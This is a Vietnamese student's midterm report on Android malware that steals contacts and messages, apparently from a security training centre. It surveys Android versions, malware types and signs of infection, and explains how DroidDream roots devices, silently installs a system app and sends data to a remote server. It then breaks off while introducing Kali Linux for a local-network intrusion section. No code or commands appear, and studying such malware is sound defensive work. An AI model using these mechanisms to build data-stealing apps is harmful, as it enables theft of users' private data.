Cơ sở lý thuyết về hệ thống điều khiển và giám sát các thiết bị trong nhà.docx
Bao cao giua ki
1. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO GIỮA KÌ
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH
CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN
TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Trang 1
CBHD: Võ Đỗ Thắng
SVTT: Lê Trần Xuân Lãnh
2. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 2
1. Giới thiệu về Android
1.1.Android là gì?
Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động
có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007
cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần
cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di
động. Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.
Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã
nguồn mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết
bị, mạng di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một
cách tự do. Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng
dụng để mở rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào
tháng 10 năm 2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google
Play, cửa hàng ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt.
Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế
giới, vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần
một hệ điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công
nghệ cao thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy
tính bảng, Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở
của Android cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng
mã nguồn mở để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính
năng cao cấp cho những người dùng thích tìm tòihoặc đưa Android vào các thiết bị ban đầu chạy
hệ điều hành khác.
Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm
2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự
thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến
bằng phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty
công nghệ.
1.2.Lịch sử phát triển Anroid
Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo
Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google
gồm có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire
Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm
thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của
Android, ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những
tin đồn về việc Google có ý định bước vào thị trường điện thoại di động.
3. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt
nhân Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những
tiền đề về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn
nguồn] Một số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và
các đối tác phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp
độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động
xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng
Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang
nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài
viết về những tin đồn cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu
Google. Và lại càng có nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả
công nghệ và trình diễn các mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng.
Trang 3
1.3.Đặt điểm của Android
1.3.1. Tính mở
Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp
dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng
dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử
dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người
dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã
được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó
có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát
triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo.
1.3.2. Tính ngang bằng của các ứng dụng.
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên
thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện
thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ
các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể
ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình
thích.
1.3.3. Phá vỡ rào cản phát triển ứng dụng.
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp
thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí
trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể
xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo
khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và
dịch vụ định vị toàn cầu GPS.
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho
phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp.
Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
4. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trang 4
1.4.Các phiên bản của android
Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11
năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008.
Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản
cập nhật cho hệ điều hành này kể từ khi ra mắt.
Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành
theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3),
Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean
(4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được
kích hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat
4.4, nó được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA.
Bảng thống kê các phiên bản và cập nhật của Android
Phiên bản API Tên Ngày phát hành
1.0 Cấp 1 23/9/ 2008
1.1 Cấp 2 9/2/2009
1.5 Cấp 3 Cupcake 30/4/2009
1.6 Cấp 4 Donut 15/9/2009
2.0 Cấp 5
Eclair
26/10/2009
2.0.1 Cấp 6 3/12/2009
2.1 Cấp 7 12/1/2010
2.2
Cấp 8 Froyo
20/5/2010
2.2.1 18/1/2011
2.2.2 22/1/2011
2.2.3 21/11/2011
2.3
Cấp 9 Gingerbread
6/12/2010
2.3.1 12/2010
2.3.2 1/2011
2.3.3
Cấp 10 Gingerbread
9/2/2011
2.3.4 28/4/2011
2.3.5 25/7/2011
2.3.6 2/9/2011
2.3.7 21/9/2011
3.0 Cấp 11
Honeycomb
22/2/2011
3.1 Cấp 12 10/5/2011
3.2
Cấp 13
15/7/2011
3.2.1 20/9/2011
3.2.2 30/8/2011
3.2.3
5. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
3.2.4 12/2011
3.2.5 1/2012
3.2.6 2/1012
4.0
Trang 5
Cấp 14
Ice Cream
Sandwich
19/10/2011
4.0.1 21/10/2011
4.0.2 28/11/2011
4.0.3
Cấp 15
16/12/2011
4.0.4 29/3/2012
4.1
Cấp 16 Jelly Bean
9/7/2012
4.1.1 23/7/2012
4.1.2 9/10/2012
4.2
Cấp 17
13/11/2012
4.2.1 27/11/2012
4.2.2 11/2/2013
4.3
Cấp 18
24/7/1013
4.3.1 3/10/2013
4.4
Cấp 19 KitKat
31/10/2013
4.4.1 5/12/2013
4.4.2 9/12/2013
4.4.3 2/6/2014
4.4.4 19/6/2014
1.5.Tỷ lệ sử dụng các phiên bản android
Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được
phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng
với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ
hơn là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010.
Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014
6. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):
Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản
nâng cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh,
nó được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh.
Ngoài bố trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập
nhật, tăng tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống
điện thoại SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ
trợ NFC, hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video
WebM/VP8 và AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên
các thiết bị mới hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời
thu gom rác thải và hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ
cho Gingerbread theo phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như:
hỗ trợ cho giọng nói hoặc video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail,
hình ảnh động bóng cho danh sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin.
Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các
Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt
các tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về
cơ bản là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật
như: nút mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to-
zoom, chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen,
tính năng mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình
duyệt chrome đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được
xây dựng trong biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng
Trang 6
7. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
thái và hình ảnh hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video
1080p
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt
Android 2.3 Android 4.0
Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và
cho không gian người sử dụng
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và
cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB
Trang 7
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5 inch
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779
(16:9)
- Công nghệ màn hình được sử dụng là
công nghệ “ Square pixels”
Màn hình:
- Màn hình phải có kích cỡ ít nhất
426x320
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85
(16:9)
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 55 MB
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 100 MB
1.6.2. Sự khác nhau về giao diện
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm
ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý
các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập
tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản
hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển
và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của
người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy
theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang
điều khiển vô-lăng.
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các
thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn.
Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
8. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động
như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình
chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù
giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp
đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có
trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn
hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng
hạn.Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi
của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh.
Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết
nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan
trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián
đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể
nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung
theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở
ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.
Android 2.3 Android 4.0
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà
không cần mở ứng dụng
Trang 8
1.6.3. Sự khác nhau về tính năng
Android 2.3 Android 4.0
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet
Chỉ có thể xóa tất các các thông báo cùng lúc
trên trình quản lý
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc
trên trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị
khóa
Có thể thực hiện thêm 1 số tính năng khi màn
hình bị khoái ngoài trả lời , ngắt cuộc gọi như
9. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
gửi tin nhắn
Không có tính năng mở khóa màn hình nhận
diện khuôn mặt
Có tính năng mở khóa màn hình nhận diện
khuôn mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện
được tất cả các camera trên thiết bị
Trang 9
1.6.4. Sự khác nhau về giao thức mạng
Android 2.3 Android 4.0
Không hỗ trợ giao thức https Hỗ trợ giao thức https
2. Nghiên cứu về mã độc trong mỗi trường android
2.1.Malware là gì?
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều
hành cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một
cách nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
10. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các
máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại
không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần
mềm độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói
về vấn đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết:
“Malware trên Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi
đã phát hiện ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi
MYOURNET, Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên
Android Market, mà hầu hết các ứng dụng đó đều chứa mã độc”.
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám
chương trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần
mềm độc hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm
2012, Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động
mới mỗi tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến
nhiều tăng hơn tám lần.
Trang 10
2.2.Phân loại
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến
các số điện thoại được đánh giá cao.
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại
khác hoặc ăn cắp dữ liệu cá nhân của người dùng.
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
11. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần
mềm độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet
Security, SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn
cho người sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân
hàng trên di động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất
của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được
vào Google Play cũng như kho ứng dụng của Apple.
Trang 11
2.3.Cơ chế hoạt động của Malware
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware
DroidDream. Malware này hoạt động qua 2 giai đoạn:
Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng
chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của
bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép quyền
uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm
tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream chiếm
được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống
này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.
Nghiên cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn
đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng
dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể
biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các
công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng
thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó
khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.
2.4.Mục đích của Malware DroidDream
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của
con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự
động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến
đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin
nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng
tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác
là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân
hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng
12. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware
này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn
đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì
vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của
người dùng hệ điều hành này.
2.5.Dấu hiệu bị nhiễm các phần mềm độc hại
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành
động khác thường và bạn không thể thay đổi được bất kỳ điều gì.
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự
động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển
giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi
bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
3. Xâm nhập android qua mạng local
3.1.Giới thiệu về Kali Linux
Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia
đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không
ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới.
Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà
Trang 12
chưa từng nghe về BackTrack.
Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến
hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali
là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn
võ thuật của người Philippine ...
Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên
gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ
một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp.
- Ưu điểm và Nhược điểm:
Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản
phân phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân
loại rõ ràng để sử dụng.
13. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần
mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập
nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các
công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian.
Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó
cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các
công cụ.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM.
Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra.
Trang 13
3.1.2. Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho
một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu
cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
3.1.3. Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ
đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy
theo sở thích và thói quen sử dụng.
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với
BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn
toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
